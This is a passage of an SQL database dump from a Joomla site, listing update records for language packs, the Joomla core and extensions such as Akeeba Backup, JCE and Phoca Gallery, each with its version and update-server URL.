Latin','','pkg_sr-YU','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(29337,57,0,'Spanish','','pkg_es-ES','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(29338,57,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(29339,57,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(29340,57,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(29341,57,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.27.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(29342,57,0,'English CA','','pkg_en-CA','package','',0,'3.9.27.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(29343,57,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(29344,57,0,'Dari Persian','','pkg_prs-AF','package','',0,'3.4.4.3','','https://update.joomla.org/language/details3/prs-AF_details.xml','',''),(29345,57,0,'German CH','','pkg_de-CH','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(29346,57,0,'German AT','','pkg_de-AT','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(29347,57,0,'German LI','','pkg_de-LI','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(29348,57,0,'German LU','','pkg_de-LU','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(29349,57,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.27.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(29350,57,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(29351,93,0,'Regular Labs - Sourcerer','','sourcerer','plugin','system',0,'8.4.3FREE','','https://download.regularlabs.com/updates.xml?e=sourcerer&type=.xml','https://www.regularlabs.com/extensions/sourcerer/features',''),(29352,122,0,'Google Structured Data Free','Google Structured Data Free','gsd','plugin','system',0,'4.8.7','','https://static.tassos.gr/update/gsdfree?type=.xml','\n			https://www.tassos.gr/releases/google-structured-data-markup/google-structured-data-markup-4-8-7			\n		',''),(29353,129,0,'JCE 2.9.10','Installation package for Joomla! 3.x and 4.x','pkg_jce','package','',0,'2.9.10','','https://cdn.joomlacontenteditor.net/updates/xml/editor/pkg_jce.xml','https://www.joomlacontenteditor.net/news/jce-pro-2-9-10-released',''),(29354,135,0,' Phoca Gallery ',' Phoca Gallery is an efficient image gallery extension for Joomla! CMS. ','com_phocagallery','component','',1,'4.4.3','','https://raw.githubusercontent.com/PhocaCz/PhocaGallery/master/manifest.xml','http://www.phoca.cz/version/index.php?phocagallery=4.4.3',''),(29355,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.0.6','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-0-6.html',''),(29356,1,0,'Joomla','','joomla','file','',0,'3.9.28','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(29357,1,0,'Joomla','','joomla','file','',0,'3.9.28','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(29358,1,0,'Joomla','','joomla','file','',0,'3.9.28','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(29359,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.0.6','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-0-6.html',''),(29360,1,0,'Joomla','','joomla','file','',0,'3.9.28','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(29361,1,0,'Joomla','','joomla','file','',0,'3.9.28','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(29362,1,0,'Joomla','','joomla','file','',0,'3.9.28','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(29363,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.0.6','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-0-6.html',''),(29364,1,0,'Joomla','','joomla','file','',0,'3.9.28','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(29365,1,0,'Joomla','','joomla','file','',0,'3.9.28','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(29366,1,0,'Joomla','','joomla','file','',0,'3.9.28','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(29367,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.0.6','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-0-6.html',''),(29368,1,0,'Joomla','','joomla','file','',0,'3.9.28','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(29369,1,0,'Joomla','','joomla','file','',0,'3.9.28','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(29370,1,0,'Joomla','','joomla','file','',0,'3.9.28','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(29371,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.0.6','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-0-6.html',''),(29372,1,0,'Joomla','','joomla','file','',0,'3.9.28','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(29373,3,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(29374,3,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(29375,3,0,'French','','pkg_fr-FR','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(29376,3,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(29377,3,0,'Greek','','pkg_el-GR','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(29378,3,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(29379,3,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(29380,3,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(29381,3,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.27.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(29382,3,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(29383,3,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(29384,3,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.28.2','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(29385,3,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.27.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(29386,3,0,'Danish','','pkg_da-DK','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(29387,3,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(29388,3,0,'Estonian','','pkg_et-EE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(29389,3,0,'Italian','','pkg_it-IT','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(29390,3,0,'Latvian','','pkg_lv-LV','package','',0,'3.9.25.2','','https://update.joomla.org/language/details3/lv-LV_details.xml','',''),(29391,3,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(29392,3,0,'Norwegian Bokmal','','pkg_nb-NO','package','',0,'3.9.27.1','','https://update.joomla.org/language/details3/nb-NO_details.xml','',''),(29393,3,0,'Persian','','pkg_fa-IR','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(29394,3,0,'Polish','','pkg_pl-PL','package','',0,'3.9.25.2','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(29395,3,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(29396,3,0,'Russian','','pkg_ru-RU','package','',0,'3.9.27.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(29397,3,0,'English AU','','pkg_en-AU','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(29398,3,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(29399,3,0,'English US','','pkg_en-US','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(29400,3,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(29401,3,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(29402,3,0,'Thai','','pkg_th-TH','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(29403,3,0,'Turkish','','pkg_tr-TR','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/tr-TR_details.xml','',''),(29404,3,0,'Ukrainian','','pkg_uk-UA','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/uk-UA_details.xml','',''),(29405,3,0,'Uyghur','','pkg_ug-CN','package','',0,'3.7.5.2','','https://update.joomla.org/language/details3/ug-CN_details.xml','',''),(29406,3,0,'Basque','','pkg_eu-ES','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/eu-ES_details.xml','',''),(29407,3,0,'German DE','','pkg_de-DE','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(29408,3,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(29409,3,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(29410,3,0,'Spanish','','pkg_es-ES','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(29411,3,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(29412,3,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(29413,3,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(29414,3,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(29415,3,0,'English CA','','pkg_en-CA','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(29416,3,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(29417,3,0,'Dari Persian','','pkg_prs-AF','package','',0,'3.4.4.3','','https://update.joomla.org/language/details3/prs-AF_details.xml','',''),(29418,3,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(29419,3,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(29420,3,0,'German CH','','pkg_de-CH','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(29421,3,0,'German AT','','pkg_de-AT','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(29422,3,0,'German LI','','pkg_de-LI','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(29423,3,0,'German LU','','pkg_de-LU','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(29424,3,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(29425,3,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(29426,1,0,'Joomla','','joomla','file','',0,'3.9.28','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(29427,57,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(29428,57,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(29429,57,0,'French','','pkg_fr-FR','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(29430,57,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(29431,57,0,'Greek','','pkg_el-GR','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(29432,57,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(29433,57,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(29434,57,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(29435,57,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.27.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(29436,57,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(29437,57,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(29438,57,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.28.2','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(29439,57,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.27.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(29440,57,0,'Danish','','pkg_da-DK','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(29441,57,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(29442,57,0,'Estonian','','pkg_et-EE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(29443,57,0,'Italian','','pkg_it-IT','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(29444,57,0,'Latvian','','pkg_lv-LV','package','',0,'3.9.25.2','','https://update.joomla.org/language/details3/lv-LV_details.xml','',''),(29445,57,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(29446,57,0,'Norwegian Bokmal','','pkg_nb-NO','package','',0,'3.9.27.1','','https://update.joomla.org/language/details3/nb-NO_details.xml','',''),(29447,57,0,'Persian','','pkg_fa-IR','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(29448,57,0,'Polish','','pkg_pl-PL','package','',0,'3.9.25.2','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(29449,57,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(29450,57,0,'Russian','','pkg_ru-RU','package','',0,'3.9.27.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(29451,57,0,'English AU','','pkg_en-AU','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(29452,57,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(29453,57,0,'English US','','pkg_en-US','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(29454,57,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(29455,57,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(29456,57,0,'Thai','','pkg_th-TH','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(29457,57,0,'Turkish','','pkg_tr-TR','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/tr-TR_details.xml','',''),(29458,57,0,'Ukrainian','','pkg_uk-UA','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/uk-UA_details.xml','',''),(29459,57,0,'Uyghur','','pkg_ug-CN','package','',0,'3.7.5.2','','https://update.joomla.org/language/details3/ug-CN_details.xml','',''),(29460,57,0,'Basque','','pkg_eu-ES','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/eu-ES_details.xml','',''),(29461,57,0,'German DE','','pkg_de-DE','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(29462,57,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(29463,57,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(29464,57,0,'Spanish','','pkg_es-ES','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(29465,57,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(29466,57,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(29467,57,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(29468,57,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(29469,57,0,'English CA','','pkg_en-CA','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(29470,57,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(29471,57,0,'Dari Persian','','pkg_prs-AF','package','',0,'3.4.4.3','','https://update.joomla.org/language/details3/prs-AF_details.xml','',''),(29472,57,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(29473,57,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(29474,57,0,'German CH','','pkg_de-CH','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(29475,57,0,'German AT','','pkg_de-AT','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(29476,57,0,'German LI','','pkg_de-LI','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(29477,57,0,'German LU','','pkg_de-LU','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(29478,57,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(29479,57,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(29480,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.0.6','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-0-6.html',''),(29481,93,0,'Regular Labs - Sourcerer','','sourcerer','plugin','system',0,'8.5.0','','https://download.regularlabs.com/updates.xml?e=sourcerer&type=.xml','https://www.regularlabs.com/extensions/sourcerer/features',''),(29482,122,0,'Google Structured Data Free','Google Structured Data Free','gsd','plugin','system',0,'4.8.7','','https://static.tassos.gr/update/gsdfree?type=.xml','\n			https://www.tassos.gr/releases/google-structured-data-markup/google-structured-data-markup-4-8-7			\n		',''),(29483,129,0,'JCE 2.9.10','Installation package for Joomla! 3.x and 4.x','pkg_jce','package','',0,'2.9.10','','https://cdn.joomlacontenteditor.net/updates/xml/editor/pkg_jce.xml','https://www.joomlacontenteditor.net/news/jce-pro-2-9-10-released',''),(29484,135,0,' Phoca Gallery ',' Phoca Gallery is an efficient image gallery extension for Joomla! CMS. ','com_phocagallery','component','',1,'4.4.3','','https://raw.githubusercontent.com/PhocaCz/PhocaGallery/master/manifest.xml','http://www.phoca.cz/version/index.php?phocagallery=4.4.3',''),(29485,1,0,'Joomla','','joomla','file','',0,'3.9.28','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(29486,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.0.6','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-0-6.html',''),(29487,1,0,'Joomla','','joomla','file','',0,'3.9.28','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(29488,1,0,'Joomla','','joomla','file','',0,'3.9.28','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(29489,3,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(29490,3,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(29491,3,0,'French','','pkg_fr-FR','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(29492,3,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(29493,3,0,'Greek','','pkg_el-GR','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(29494,3,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(29495,3,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(29496,3,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(29497,3,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.27.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(29498,3,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(29499,3,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(29500,3,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.28.2','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(29501,3,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.27.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(29502,3,0,'Danish','','pkg_da-DK','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(29503,3,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(29504,3,0,'Estonian','','pkg_et-EE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(29505,3,0,'Italian','','pkg_it-IT','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(29506,3,0,'Latvian','','pkg_lv-LV','package','',0,'3.9.25.2','','https://update.joomla.org/language/details3/lv-LV_details.xml','',''),(29507,3,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(29508,3,0,'Norwegian Bokmal','','pkg_nb-NO','package','',0,'3.9.27.1','','https://update.joomla.org/language/details3/nb-NO_details.xml','',''),(29509,3,0,'Persian','','pkg_fa-IR','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(29510,3,0,'Polish','','pkg_pl-PL','package','',0,'3.9.25.2','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(29511,3,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.29.2','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(29512,3,0,'Russian','','pkg_ru-RU','package','',0,'3.9.27.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(29513,3,0,'English AU','','pkg_en-AU','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(29514,3,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(29515,3,0,'English US','','pkg_en-US','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(29516,3,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(29517,3,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(29518,3,0,'Thai','','pkg_th-TH','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(29519,3,0,'Turkish','','pkg_tr-TR','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/tr-TR_details.xml','',''),(29520,3,0,'Ukrainian','','pkg_uk-UA','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/uk-UA_details.xml','',''),(29521,3,0,'Uyghur','','pkg_ug-CN','package','',0,'3.7.5.2','','https://update.joomla.org/language/details3/ug-CN_details.xml','',''),(29522,3,0,'Basque','','pkg_eu-ES','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/eu-ES_details.xml','',''),(29523,3,0,'German DE','','pkg_de-DE','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(29524,3,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(29525,3,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(29526,3,0,'Spanish','','pkg_es-ES','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(29527,3,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(29528,3,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(29529,3,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(29530,3,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(29531,3,0,'English CA','','pkg_en-CA','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(29532,3,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(29533,3,0,'Dari Persian','','pkg_prs-AF','package','',0,'3.4.4.3','','https://update.joomla.org/language/details3/prs-AF_details.xml','',''),(29534,3,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(29535,3,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(29536,3,0,'German CH','','pkg_de-CH','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(29537,3,0,'German AT','','pkg_de-AT','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(29538,3,0,'German LI','','pkg_de-LI','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(29539,3,0,'German LU','','pkg_de-LU','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(29540,3,0,'English 